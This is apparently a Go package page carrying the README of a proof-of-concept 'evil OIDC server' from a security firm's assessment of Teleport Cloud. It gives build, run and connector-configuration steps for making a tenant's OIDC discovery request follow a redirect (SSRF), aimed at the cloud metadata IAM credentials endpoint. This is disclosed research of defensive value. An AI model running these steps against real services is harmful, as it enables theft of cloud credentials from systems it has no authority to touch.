oidc-ssrf

command module
v0.0.0-...-3dd038b Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Oct 19, 2022 License: Apache-2.0 Imports: 12 Imported by: 0

README

oidc-ssrf

Evil OIDC server: the OpenID Configuration URL returns a 307 to cause SSRF.

1. Install

git clone --depth=1 https://github.com/doyensec/oidc-ssrf.git
cd oidc-ssrf
go get "github.com/dgrijalva/jwt-go"
go build oidc.go

2. Run the OIDC server

The OIDC server will have to run on a domain with HTTPS.

./oidc -listen 0.0.0.0:5999 \
       -issuer https://dscollaborator.example.com/ \
       -ssrf http://169.254.169.254/latest/meta-data/iam/security-credentials/

The issuer should be the publicly exposed URL of the OIDC server.

You can use an ngrok tunnel, caddy or something else to proxy the OIDC server (port 5999) over HTTPS. You need to be able to access the OIDC server from the issuer URL.

3. Add OIDC auth connector

Logged in as an admin of your tenant, go to Team > Auth Connectors > New Auth Connector > OIDC CONNECTOR.

kind: oidc
metadata:
  name: ssrfpoc
spec:
  claims_to_roles:
  - claim: hd
    roles:
    - admin
    value: example.com
  client_id: <client id>
  client_secret: <client secret>
  display: ssrfpoc
  issuer_url: https://dscollaborator.example.com/
  redirect_url: https://doyensec--------------------bc.teleport.sh/v1/webapi/oidc/callback
  scope:
  - <scope value>
version: v2

Change the issuer_url (must match your domain and end in a forward slash) and redirect_url (use your tenant's cluster domain).

You should see the message Returning nice friendly OpenID Configuration in the OIDC server output. Wait one minute just to make sure the config is synced (may not be strictly necessary).

4. Try to login

Attempt to login to the tenant web interface via the SSRFPOC method above (using private browsing or another browser). The login attempt will fail. In the admin tab look in Activity > Audit Log. You should see a "SSO Login Failed" message:

SSO user login failed [
  OAuth2 error code=unsupported_response_type,
  message=failed to decode provider response "tenant-doyensec--------------------bc-role"
]

5. Try different SSRFs

The Go server can be killed and restarted with different SSRF urls such as:

You can continually attempt different SSRFs by retrying step 4.

Credits

This PoC has been created by Doyensec LLC for the Q1 2021 assessment of Teleport Cloud.

alt text

Documentation

The Go Gopher

There is no documentation for this package.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.